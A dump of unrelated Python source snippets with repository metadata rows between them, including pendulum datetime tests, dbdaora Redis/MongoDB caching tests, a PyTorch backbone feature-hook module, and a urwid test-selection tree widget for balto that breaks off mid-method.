dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert closest == dt1
closest = instance.closest(dt2, dt1)
assert closest == dt1
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(
hours=x) for x in range(4)]
closest = instance.closest(*dts)
assert closest == dts[0]
closest = instance.closest(*(dts[::-1]))
assert closest == dts[0]
def test_closest_with_datetime():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = datetime(2015, 5, 28, 11, 0, 0)
dt2 = datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert_datetime(closest, 2015, 5, 28, 11, 0, 0)
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(
hours=x) for x in range(4)]
closest = instance.closest(dt1, dt2, *dts)
assert_datetime(closest, 2015, 5, 28, 11, 0, 0)
def test_closest_with_equals():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert closest == dt1
def test_farthest():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 11, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
farthest = instance.farthest(dt1, dt2)
assert farthest == dt2
farthest = instance.farthest(dt2, dt1)
assert farthest == dt2
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(
hours=x) for x in range(4)]
farthest = instance.farthest(*dts)
assert farthest == dts[-1]
farthest = instance.farthest(*(dts[::-1]))
assert farthest == dts[-1]
f = pendulum.datetime(2010, 1, 1, 0, 0, 0)
assert f == instance.farthest(f, *(dts))
def test_farthest_with_datetime():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = datetime(2015, 5, 28, 11, 0, 0, tzinfo= pendulum.UTC)
dt2 = datetime(2015, 5, 28, 14, 0, 0, tzinfo= pendulum.UTC)
farthest = instance.farthest(dt1, dt2)
assert_datetime(farthest, 2015, 5, 28, 14, 0, 0)
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(
hours=x) for x in range(4)]
farthest = instance.farthest(dt1, dt2, *dts)
assert_datetime(farthest, 2015, 5, 28, 19, 0, 0)
def test_farthest_with_equals():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
farthest = instance.farthest(dt1, dt2)
assert farthest == dt2
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x) for x in range(4)]
farthest = instance.farthest(dt1, dt2, *dts)
assert farthest == dts[-1]
def test_is_same_day():
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 29, 12, 0, 0)
dt3 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt4 = datetime(2015, 5, 28, 12, 0, 0, tzinfo=pendulum.UTC)
dt5 = datetime(2015, 5, 29, 12, 0, 0, tzinfo=pendulum.UTC)
assert not dt1.is_same_day(dt2)
assert dt1.is_same_day(dt3)
assert dt1.is_same_day(dt4)
assert not dt1.is_same_day(dt5)
def test_comparison_to_unsupported():
dt1 = pendulum.now()
assert dt1 != 'test'
assert dt1 not in ['test']
| 29.468493
| 99
| 0.637226
| 1,694
| 10,756
| 3.942739
| 0.051358
| 0.184459
| 0.140141
| 0.121575
| 0.877377
| 0.849678
| 0.825722
| 0.818536
| 0.80566
| 0.793233
| 0
| 0.148241
| 0.217925
| 10,756
| 364
| 100
| 29.549451
| 0.645744
| 0
| 0
| 0.669323
| 0
| 0
| 0.049554
| 0
| 0
| 0
| 0
| 0
| 0.314741
| 1
| 0.139442
| false
| 0
| 0.015936
| 0
| 0.155378
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
40896a49e8a9d3a6dbc4283ab3c30866b79f8155
| 11,473
|
py
|
Python
|
dbdaora/hash/_tests/mongodb/test_integration_service_hash_aioredis_mongodb_get_many.py
|
dutradda/sqldataclass
|
5c87a3818e9d736bbf5e1438edc5929a2f5acd3f
|
[
"MIT"
] | 21
|
2019-10-14T14:33:33.000Z
|
2022-02-11T04:43:07.000Z
|
dbdaora/hash/_tests/mongodb/test_integration_service_hash_aioredis_mongodb_get_many.py
|
dutradda/sqldataclass
|
5c87a3818e9d736bbf5e1438edc5929a2f5acd3f
|
[
"MIT"
] | null | null | null |
dbdaora/hash/_tests/mongodb/test_integration_service_hash_aioredis_mongodb_get_many.py
|
dutradda/sqldataclass
|
5c87a3818e9d736bbf5e1438edc5929a2f5acd3f
|
[
"MIT"
] | 1
|
2019-09-29T23:51:44.000Z
|
2019-09-29T23:51:44.000Z
|
import itertools
import asynctest
import pytest
from aioredis import RedisError
from jsondaora import dataclasses
@pytest.mark.asyncio
async def test_should_get_many(
fake_service,
serialized_fake_entity,
fake_entity,
serialized_fake_entity2,
fake_entity2,
):
await fake_service.repository.memory_data_source.delete(
'fake:other_fake:fake'
)
await fake_service.repository.memory_data_source.delete(
'fake:other_fake:fake2'
)
await fake_service.repository.memory_data_source.hmset(
'fake:other_fake:fake',
*itertools.chain(*serialized_fake_entity.items()),
)
await fake_service.repository.memory_data_source.hmset(
'fake:other_fake:fake2',
*itertools.chain(*serialized_fake_entity2.items()),
)
entities = [
e
async for e in fake_service.get_many(
'fake', 'fake2', other_id='other_fake'
)
]
assert entities == [fake_entity, fake_entity2]
@pytest.mark.asyncio
async def test_should_get_many_from_cache(
fake_service, serialized_fake_entity, fake_entity, fake_entity2
):
fake_service.repository.memory_data_source.hgetall = (
asynctest.CoroutineMock()
)
fake_service.cache['fakeother_idother_fake'] = fake_entity
fake_service.cache['fake2other_idother_fake'] = fake_entity2
entities = [
e
async for e in fake_service.get_many(
'fake', 'fake2', other_id='other_fake'
)
]
assert entities == [fake_entity, fake_entity2]
assert not fake_service.repository.memory_data_source.hgetall.called
@pytest.mark.asyncio
async def test_should_get_many_from_fallback_when_not_found_on_memory(
fake_service, serialized_fake_entity, fake_entity, fake_entity2
):
await fake_service.repository.memory_data_source.delete(
'fake:other_fake:fake'
)
await fake_service.repository.memory_data_source.delete(
'fake:other_fake:fake2'
)
await fake_service.repository.memory_data_source.delete(
'fake:not-found:other_fake:fake'
)
await fake_service.repository.memory_data_source.delete(
'fake:not-found:other_fake:fake2'
)
await fake_service.repository.fallback_data_source.put(
fake_service.repository.fallback_data_source.make_key(
'fake', 'other_fake:fake'
),
dataclasses.asdict(fake_entity),
)
await fake_service.repository.fallback_data_source.put(
fake_service.repository.fallback_data_source.make_key(
'fake', 'other_fake:fake2'
),
dataclasses.asdict(fake_entity2),
)
entities = [
e
async for e in fake_service.get_many(
'fake', 'fake2', other_id='other_fake'
)
]
assert entities == [fake_entity, fake_entity2]
assert fake_service.repository.memory_data_source.exists(
'fake:other_fake:fake'
)
assert fake_service.repository.memory_data_source.exists(
'fake:other_fake:fake2'
)
@pytest.mark.asyncio
async def test_should_get_many_from_fallback_when_not_found_on_memory_with_fields(
fake_service, serialized_fake_entity, fake_entity, fake_entity2
):
await fake_service.repository.memory_data_source.delete(
'fake:other_fake:fake'
)
await fake_service.repository.memory_data_source.delete(
'fake:other_fake:fake2'
)
await fake_service.repository.memory_data_source.delete(
'fake:not-found:other_fake:fake'
)
await fake_service.repository.memory_data_source.delete(
'fake:not-found:other_fake:fake2'
)
await fake_service.repository.fallback_data_source.put(
fake_service.repository.fallback_data_source.make_key(
'fake', 'other_fake:fake'
),
dataclasses.asdict(fake_entity),
)
await fake_service.repository.fallback_data_source.put(
fake_service.repository.fallback_data_source.make_key(
'fake', 'other_fake:fake2'
),
dataclasses.asdict(fake_entity2),
)
fake_entity.number = None
fake_entity.boolean = None
fake_entity2.number = None
fake_entity2.boolean = None
entities = [
e
async for e in fake_service.get_many(
'fake',
'fake2',
other_id='other_fake',
fields=['id', 'other_id', 'integer', 'inner_entities'],
)
]
assert entities == [fake_entity, fake_entity2]
assert fake_service.repository.memory_data_source.exists(
'fake:other_fake:fake'
)
assert fake_service.repository.memory_data_source.exists(
'fake:other_fake:fake2'
)
@pytest.mark.asyncio
async def test_should_get_many_from_fallback_after_open_circuit_breaker(
fake_service, fake_entity, fake_entity2, mocker
):
fake_service.repository.memory_data_source.hgetall = asynctest.CoroutineMock(
side_effect=RedisError
)
key = fake_service.repository.fallback_data_source.make_key(
'fake', 'other_fake', 'fake'
)
await fake_service.repository.fallback_data_source.put(
key, dataclasses.asdict(fake_entity)
)
key = fake_service.repository.fallback_data_source.make_key(
'fake', 'other_fake', 'fake2'
)
await fake_service.repository.fallback_data_source.put(
key, dataclasses.asdict(fake_entity2)
)
entities = [
e
async for e in fake_service.get_many(
'fake', 'fake2', other_id='other_fake'
)
]
assert entities == [fake_entity, fake_entity2]
assert fake_service.logger.warning.call_count == 2
@pytest.mark.asyncio
async def test_should_get_many_with_fields(
fake_service,
serialized_fake_entity,
fake_entity,
serialized_fake_entity2,
fake_entity2,
):
await fake_service.repository.memory_data_source.hmset(
'fake:other_fake:fake',
*itertools.chain(*serialized_fake_entity.items()),
)
await fake_service.repository.memory_data_source.hmset(
'fake:other_fake:fake2',
*itertools.chain(*serialized_fake_entity2.items()),
)
entities = [
e
async for e in fake_service.get_many(
'fake',
'fake2',
fields=['id', 'other_id', 'integer', 'inner_entities'],
other_id='other_fake',
)
]
fake_entity.number = None
fake_entity.boolean = None
fake_entity2.number = None
fake_entity2.boolean = None
assert entities == [fake_entity, fake_entity2]
@pytest.mark.asyncio
async def test_should_get_many_from_cache_with_fields(
fake_service, serialized_fake_entity, fake_entity, fake_entity2
):
fake_service.repository.memory_data_source.hgetall = (
asynctest.CoroutineMock()
)
fake_service.cache[
'fakeidother_idintegerinner_entitiesother_idother_fake'
] = fake_entity
fake_service.cache[
'fake2idother_idintegerinner_entitiesother_idother_fake'
] = fake_entity2
entities = [
e
async for e in fake_service.get_many(
'fake',
'fake2',
fields=['id', 'other_id', 'integer', 'inner_entities'],
other_id='other_fake',
)
]
fake_entity.number = None
fake_entity.boolean = None
fake_entity2.number = None
fake_entity2.boolean = None
assert entities == [fake_entity, fake_entity2]
assert not fake_service.repository.memory_data_source.hgetall.called
@pytest.mark.asyncio
async def test_should_get_many_from_fallback_after_open_circuit_breaker_with_fields(
fake_service, fake_entity, fake_entity2, mocker
):
fake_service.repository.memory_data_source.hmget = asynctest.CoroutineMock(
side_effect=RedisError
)
key = fake_service.repository.fallback_data_source.make_key('fake', 'fake')
await fake_service.repository.fallback_data_source.put(
key, dataclasses.asdict(fake_entity)
)
key = fake_service.repository.fallback_data_source.make_key(
'fake', 'fake2'
)
await fake_service.repository.fallback_data_source.put(
key, dataclasses.asdict(fake_entity2)
)
fake_entity.number = None
fake_entity.boolean = None
fake_entity2.number = None
fake_entity2.boolean = None
entities = [
e
async for e in fake_service.get_many(
'fake',
'fake2',
fields=['id', 'other_id', 'integer', 'inner_entities'],
other_id='other_fake',
)
]
assert entities == [fake_entity, fake_entity2]
assert fake_service.logger.warning.call_count == 2
@pytest.mark.asyncio
async def test_should_get_many_from_cache_memory_and_fallback(
fake_service, fake_entity, fake_entity2, fake_entity3
):
await fake_service.repository.memory_data_source.delete(
'fake:other_fake:fake'
)
await fake_service.repository.memory_data_source.delete(
'fake:other_fake:fake2'
)
await fake_service.repository.memory_data_source.delete(
'fake:other_fake:fake3'
)
await fake_service.add(fake_entity)
await fake_service.add(fake_entity2)
await fake_service.add(fake_entity3)
assert not await fake_service.repository.memory_data_source.exists(
'fake:other_fake:fake'
)
assert not await fake_service.repository.memory_data_source.exists(
'fake:other_fake:fake2'
)
assert not await fake_service.repository.memory_data_source.exists(
'fake:other_fake:fake3'
)
entities = [
e async for e in fake_service.get_many('fake', other_id='other_fake')
]
assert entities == [fake_entity]
entities = [
e
async for e in fake_service.get_many(
'fake', 'fake2', other_id='other_fake'
)
]
assert entities == [fake_entity, fake_entity2]
entities = [
e
async for e in fake_service.get_many(
'fake', 'fake2', 'fake3', other_id='other_fake'
)
]
assert entities == [fake_entity, fake_entity2, fake_entity3]
assert await fake_service.repository.memory_data_source.exists(
'fake:other_fake:fake'
)
assert await fake_service.repository.memory_data_source.exists(
'fake:other_fake:fake2'
)
assert await fake_service.repository.memory_data_source.exists(
'fake:other_fake:fake3'
)
@pytest.mark.asyncio
async def test_should_get_many_from_cache_when_not_found_some_entities(
fake_service, fake_entity
):
await fake_service.delete('fake', other_id='other_fake')
await fake_service.delete('fake2', other_id='other_fake')
await fake_service.delete('fake3', other_id='other_fake')
await fake_service.add(fake_entity)
entities = [
e async for e in fake_service.get_many('fake', other_id='other_fake')
]
assert entities == [fake_entity]
entities = [
e
async for e in fake_service.get_many(
'fake', 'fake2', 'fake3', other_id='other_fake'
)
]
assert entities == [fake_entity]
@pytest.mark.asyncio
async def test_should_get_many_empty(fake_service):
await fake_service.delete('fake', other_id='other_fake')
await fake_service.delete('fake2', other_id='other_fake')
await fake_service.delete('fake3', other_id='other_fake')
assert [
e
async for e in fake_service.get_many(
'fake', 'fake2', 'fake3', other_id='other_fake'
)
] == []
| 29.877604
| 84
| 0.683605
| 1,396
| 11,473
| 5.266476
| 0.061605
| 0.134657
| 0.139962
| 0.121192
| 0.967764
| 0.95185
| 0.939336
| 0.922334
| 0.922334
| 0.908596
| 0
| 0.009306
| 0.22261
| 11,473
| 383
| 85
| 29.955614
| 0.815002
| 0
| 0
| 0.663717
| 0
| 0
| 0.118714
| 0.047677
| 0
| 0
| 0
| 0
| 0.082596
| 1
| 0
| false
| 0
| 0.014749
| 0
| 0.014749
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
40b322299f9c1736928f3955c4f8268de303d171
| 140
|
py
|
Python
|
start_app/models.py
|
noobiept-other/init_django
|
a305e1b0b289bfa166638372163fd460fc30a938
|
[
"MIT"
] | null | null | null |
start_app/models.py
|
noobiept-other/init_django
|
a305e1b0b289bfa166638372163fd460fc30a938
|
[
"MIT"
] | null | null | null |
start_app/models.py
|
noobiept-other/init_django
|
a305e1b0b289bfa166638372163fd460fc30a938
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.conf import settings
from django.utils import timezone
from django.core.urlresolvers import reverse
| 35
| 44
| 0.857143
| 21
| 140
| 5.714286
| 0.571429
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 140
| 4
| 44
| 35
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
40d277f259a7b302db5872c8114fe7ac1c4c45a1
| 208
|
py
|
Python
|
lmnotify/__init__.py
|
alexrockt/lmnotify
|
e21feb615c13eda12534b3de884bf73ea15736b2
|
[
"MIT"
] | 6
|
2017-02-17T18:49:52.000Z
|
2018-02-25T12:53:00.000Z
|
lmnotify/__init__.py
|
r-xela/lmnotify
|
e21feb615c13eda12534b3de884bf73ea15736b2
|
[
"MIT"
] | null | null | null |
lmnotify/__init__.py
|
r-xela/lmnotify
|
e21feb615c13eda12534b3de884bf73ea15736b2
|
[
"MIT"
] | null | null | null |
__all__ = [
"LaMetricManager", "SimpleFrame", "GoalFrame", "SpikeChart",
"Sound", "Model"
]
from .lmnotify import LaMetricManager
from .models import SimpleFrame, GoalFrame, SpikeChart, Sound, Model
| 26
| 68
| 0.725962
| 19
| 208
| 7.736842
| 0.578947
| 0.272109
| 0.408163
| 0.47619
| 0.544218
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149038
| 208
| 7
| 69
| 29.714286
| 0.830508
| 0
| 0
| 0
| 0
| 0
| 0.264423
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
908318735f9fe1030170605522c852bf4b3398a7
| 3,657
|
py
|
Python
|
models/backbone.py
|
Xpitfire/bpda
|
36e99cd8390b8a960ca42ffb83a85d15ab6ee9a0
|
[
"MIT"
] | 4
|
2021-11-29T15:02:57.000Z
|
2022-03-31T07:25:50.000Z
|
models/backbone.py
|
Xpitfire/bpda
|
36e99cd8390b8a960ca42ffb83a85d15ab6ee9a0
|
[
"MIT"
] | null | null | null |
models/backbone.py
|
Xpitfire/bpda
|
36e99cd8390b8a960ca42ffb83a85d15ab6ee9a0
|
[
"MIT"
] | null | null | null |
import torch
import torchvision.models as models
def set_gradients_enabled(config, model):
print('Enbable backbone gradients: ', config.backbone.trainable)
for param in model.parameters():
param.requires_grad = config.backbone.trainable
def register_domain_adaptation_features_extraction(config, model):
print('Registered feature extraction hook')
latent_features = {}
def register_hook():
def hook(model, input, output):
latent_features[config.backbone.feature_layer] = output if config.backbone.trainable else output.detach()
return hook
getattr(model, config.backbone.feature_layer).register_forward_hook(register_hook())
def features(x):
if config.backbone.trainable:
model(x)
else:
# don't compute gradients if not trainable
with torch.no_grad():
model(x)
return latent_features[config.backbone.feature_layer]
return features
def register_resnet_features_extraction(config, model):
print('Registered feature extraction hook')
latent_features = {}
def register_hook():
def hook(model, input, output):
latent_features[config.backbone.feature_layer] = output if config.backbone.trainable else output.detach()
return hook
getattr(model, config.backbone.feature_layer).register_forward_hook(register_hook())
def features(x):
if config.backbone.trainable:
model(x)
else:
# don't compute gradients if not trainable
with torch.no_grad():
model(x)
return latent_features[config.backbone.feature_layer]
return features
def register_alexnet_features_extraction(config, model):
print('Registered feature extraction hook')
latent_features = {}
def register_hook():
def hook(model, input, output):
latent_features[config.backbone.feature_layer] = output if config.backbone.trainable else output.detach()
return hook
getattr(model, config.backbone.feature_layer)[config.backbone.feature_layer_idx].register_forward_hook(register_hook())
def features(x):
if config.backbone.trainable:
model(x)
else:
# don't compute gradients if not trainable
with torch.no_grad():
model(x)
return latent_features[config.backbone.feature_layer]
return features
def get_backbone(config):
model = None
params = None
num_features = None
if config.backbone.model == "resnet18":
print('Selected ResNet18 backbone')
model = models.resnet18(pretrained=config.backbone.pretrained)
if config.debug: print(model)
model = model.to(config.device)
params = model.parameters()
num_features = list(getattr(model, config.backbone.feature_layer).parameters())[-1].shape[0]
set_gradients_enabled(config, model)
extractor = register_resnet_features_extraction(config, model)
elif config.backbone.model == "alexnet":
print('Selected AlexNet backbone')
model = models.alexnet(pretrained=config.backbone.pretrained)
if config.debug: print(model)
model = model.to(config.device)
params = model.parameters()
num_features = list(getattr(model, config.backbone.feature_layer)[config.backbone.feature_layer_idx].parameters())[-1].shape[0]
set_gradients_enabled(config, model)
extractor = register_alexnet_features_extraction(config, model)
else:
raise NotImplementedError("Not Implemented!")
return extractor, model, params, num_features
| 39.322581
| 135
| 0.686081
| 415
| 3,657
| 5.884337
| 0.163855
| 0.143325
| 0.111794
| 0.138411
| 0.806716
| 0.794431
| 0.760033
| 0.760033
| 0.760033
| 0.760033
| 0
| 0.003517
| 0.222587
| 3,657
| 92
| 136
| 39.75
| 0.855434
| 0.033361
| 0
| 0.670886
| 0
| 0
| 0.06004
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.177215
| false
| 0
| 0.025316
| 0
| 0.329114
| 0.101266
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
90930e2f14c267e3795fd938d11dc92d39b9c2dd
| 130
|
py
|
Python
|
cellcutter/alpha/ops/__init__.py
|
jiyuuchc/cellcutter
|
b5c7aac06b287407d3500e27289fa8cb0b248ef9
|
[
"MIT"
] | 5
|
2021-05-19T05:38:38.000Z
|
2022-03-14T15:38:24.000Z
|
cellcutter/alpha/ops/__init__.py
|
jiyuuchc/cellcutter
|
b5c7aac06b287407d3500e27289fa8cb0b248ef9
|
[
"MIT"
] | null | null | null |
cellcutter/alpha/ops/__init__.py
|
jiyuuchc/cellcutter
|
b5c7aac06b287407d3500e27289fa8cb0b248ef9
|
[
"MIT"
] | 1
|
2022-03-25T04:34:19.000Z
|
2022-03-25T04:34:19.000Z
|
from .boxes import *
from .clustering import *
from .common import *
from .proposal_generator import *
from .box_matcher import *
| 21.666667
| 33
| 0.769231
| 17
| 130
| 5.764706
| 0.529412
| 0.408163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 130
| 5
| 34
| 26
| 0.890909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
90b48bc52c83e3b7d611f715c281aa01a356dc28
| 12,815
|
py
|
Python
|
balto/displayer/curses_widgets.py
|
Gnonpi/balto
|
18d51f0a6ba90bc2083b34518d1ced5c2e86b7a0
|
[
"MIT"
] | null | null | null |
balto/displayer/curses_widgets.py
|
Gnonpi/balto
|
18d51f0a6ba90bc2083b34518d1ced5c2e86b7a0
|
[
"MIT"
] | null | null | null |
balto/displayer/curses_widgets.py
|
Gnonpi/balto
|
18d51f0a6ba90bc2083b34518d1ced5c2e86b7a0
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2018-2019 by Boris Feld
from __future__ import print_function
from contextlib import suppress
import urwid
from balto.suite import TestSuite
STATUS = urwid.Text("")
PROGRESS_BAR = urwid.ProgressBar("pg normal", "pg complete", 0, 1)
FOOTER = urwid.Columns([STATUS, PROGRESS_BAR])
SELECTED_TEST = set()
def set_selected_tests(tests):
global SELECTED_TEST
SELECTED_TEST = set(tests)
def get_selected_tests():
global SELECTED_TEST
return SELECTED_TEST
PALETTE = [
("body", "black", "light gray"),
("flagged", "black", "dark green", ("bold", "underline")),
("focus", "light gray", "dark blue", "standout"),
("focus Passing", "light green", "dark blue", "standout"),
("focus Failing", "light red", "dark blue", "standout"),
("flagged focus", "yellow", "dark cyan", ("bold", "standout", "underline")),
("head", "yellow", "black", "standout"),
("foot", "light gray", "black"),
("key", "light cyan", "black", "underline"),
("title", "white", "black", "bold"),
("dirmark", "black", "dark cyan", "bold"),
("flag", "dark gray", "light gray"),
# Outcomes
("failed", "dark red", "light gray"),
("passed", "dark green", "light gray"),
("error", "dark red", "light gray"),
("skipped", "dark blue", "light gray"),
("not_run", "black", "light gray"),
("pg normal", "white", "black", "standout"),
("pg complete", "white", "dark blue"),
("pg smooth", "dark blue", "black"),
]
def on_flagged(test_id, flagged):
if flagged:
SELECTED_TEST.add(test_id)
else:
with suppress(KeyError):
SELECTED_TEST.remove(test_id)
class SingleTestWidget(urwid.TreeWidget):
def __init__(self, *args, **kwargs):
self.selected_w = urwid.Text("[ ]")
super().__init__(*args, **kwargs)
# insert an extra AttrWrap for our own use
self._w = urwid.AttrWrap(self._w, None)
self.update_w()
def selectable(self):
return True
def load_inner_widget(self):
main_w = urwid.Text(self.get_display_text())
return urwid.Columns([("fixed", 3, self.selected_w), main_w], dividechars=1)
def keypress(self, size, key):
"""allow subclasses to intercept keystrokes"""
key = self.__super.keypress(size, key)
if key:
key = self.unhandled_keys(size, key)
return key
def unhandled_keys(self, size, key):
"""
Override this method to intercept keystrokes in subclasses.
Default behavior: Toggle flagged on space, ignore other keys.
"""
if key == " ":
self.get_node().toggle_flag()
else:
return key
def update_w(self):
"""Update the attributes of self.widget based on self.flagged.
"""
suite = self.get_node().get_value()
test = suite[self.get_node()._key]
outcome = test.get("outcome")
self._w.focus_attr = "focus %s" % outcome
self._w.attr = outcome
if self.get_node().flagged:
self.selected_w.set_text("[x]")
else:
self.selected_w.set_text("[ ]")
def get_display_text(self):
return self.get_node().get_key()
class SingleTestNode(urwid.TreeNode):
def __init__(self, *args, flagged=False, test_suite=None, **kwargs):
super().__init__(*args, **kwargs)
self.flagged = flagged
self.test_suite = test_suite
self.test_id = (self.test_suite, self._key)
def toggle_flag(self):
self.set_flag(not self.flagged)
def set_flag(self, flag):
self.flagged = flag
self.get_widget().update_w()
on_flagged(self.test_id, flag)
self.get_parent().check_flag()
def load_widget(self):
return SingleTestWidget(self)
def check_flag(self):
if self.test_id in SELECTED_TEST:
self.flagged = True
else:
self.flagged = False
def refresh(self):
self.check_flag()
self.get_widget().update_w()
class TestFileWidget(urwid.TreeWidget):
unexpanded_icon = urwid.SelectableIcon("▹", 0)
expanded_icon = urwid.SelectableIcon("▿", 0)
def __init__(self, *args, **kwargs):
self.selected_w = urwid.Text("[ ]")
super().__init__(*args, **kwargs)
# insert an extra AttrWrap for our own use
self._w = urwid.AttrWrap(self._w, None)
self._w.attr = "body"
self._w.focus_attr = "focus"
self.update_w()
self.expanded = True
self.update_expanded_icon()
def load_inner_widget(self):
main_w = urwid.Text(self.get_display_text())
return urwid.Columns([("fixed", 3, self.selected_w), main_w], dividechars=1)
def get_display_text(self):
return self.get_node().get_key()
def selectable(self):
return True
def keypress(self, size, key):
"""allow subclasses to intercept keystrokes"""
key = self.__super.keypress(size, key)
if key:
key = self.unhandled_keys(size, key)
return key
def unhandled_keys(self, size, key):
"""
Override this method to intercept keystrokes in subclasses.
Default behavior: Toggle flagged on space, ignore other keys.
"""
if key == " ":
self.get_node().toggle_flag()
else:
return key
def update_w(self):
"""Update the attributes of self.widget based on self.flagged.
"""
node = self.get_node()
if node.flagged:
if node.all_flagged:
icon = "x"
elif node.any_flagged:
icon = "~"
else:
raise ValueError()
self.selected_w.set_text("[%s]" % icon)
else:
self.selected_w.set_text("[ ]")
class TestFileNode(urwid.ParentNode):
def __init__(self, *args, flagged=False, test_suite=None, **kwargs):
super().__init__(*args, **kwargs)
self.flagged = flagged
self.test_suite = test_suite
self.all_flagged = False
self.any_flagged = False
def load_widget(self):
return TestFileWidget(self)
def load_child_keys(self):
data = self.get_value()
return sorted(data.get_tests_name(test_file=self._key))
def set_flag(self, flag):
self.flagged = flag
for child_key in self.get_child_keys():
child = self.get_child_node(child_key)
child.set_flag(flag)
self.get_widget().update_w()
if hasattr(self.get_parent(), "check_flag"):
self.get_parent().check_flag()
def check_flag(self):
data = self.get_value()
tests = data.get_tests_name(test_file=self._key)
stests = set()
for test in tests:
stests.add((self.get_value(), test))
self.all_flagged = stests.issubset(SELECTED_TEST)
self.any_flagged = not stests.isdisjoint(SELECTED_TEST)
if self.all_flagged or self.any_flagged:
self.flagged = True
self.get_widget().update_w()
if hasattr(self.get_parent(), "check_flag"):
self.get_parent().check_flag()
if not self.any_flagged:
self.flagged = False
self.get_widget().update_w()
if hasattr(self.get_parent(), "check_flag"):
self.get_parent().check_flag()
def toggle_flag(self):
self.set_flag(not self.flagged)
def load_child_node(self, key):
data = self.get_value()
test = data[key]
if test:
child_class = SingleTestNode
else:
child_class = self.__class__
return child_class(
data,
parent=self,
key=key,
depth=self.get_depth() + 1,
flagged=self.flagged,
test_suite=self.get_value(),
)
def refresh(self):
self._child_keys = None
self.check_flag()
for child_key in self.get_child_keys():
child = self.get_child_node(child_key)
child.refresh()
class TestSuiteWidget(urwid.TreeWidget):
unexpanded_icon = urwid.SelectableIcon("▹", 0)
expanded_icon = urwid.SelectableIcon("▿", 0)
def __init__(self, *args, **kwargs):
self.selected_w = urwid.Text("[ ]")
super().__init__(*args, **kwargs)
# insert an extra AttrWrap for our own use
self._w = urwid.AttrWrap(self._w, None)
self._w.attr = "body"
self._w.focus_attr = "focus"
self.update_w()
self.expanded = True
self.update_expanded_icon()
def load_inner_widget(self):
main_w = urwid.Text(self.get_display_text())
return urwid.Columns([("fixed", 3, self.selected_w), main_w], dividechars=1)
def get_display_text(self):
return self.get_node().get_key()
def selectable(self):
return True
def keypress(self, size, key):
"""allow subclasses to intercept keystrokes"""
key = self.__super.keypress(size, key)
if key:
key = self.unhandled_keys(size, key)
return key
def unhandled_keys(self, size, key):
"""
Override this method to intercept keystrokes in subclasses.
Default behavior: Toggle flagged on space, ignore other keys.
"""
if key == " ":
self.get_node().toggle_flag()
else:
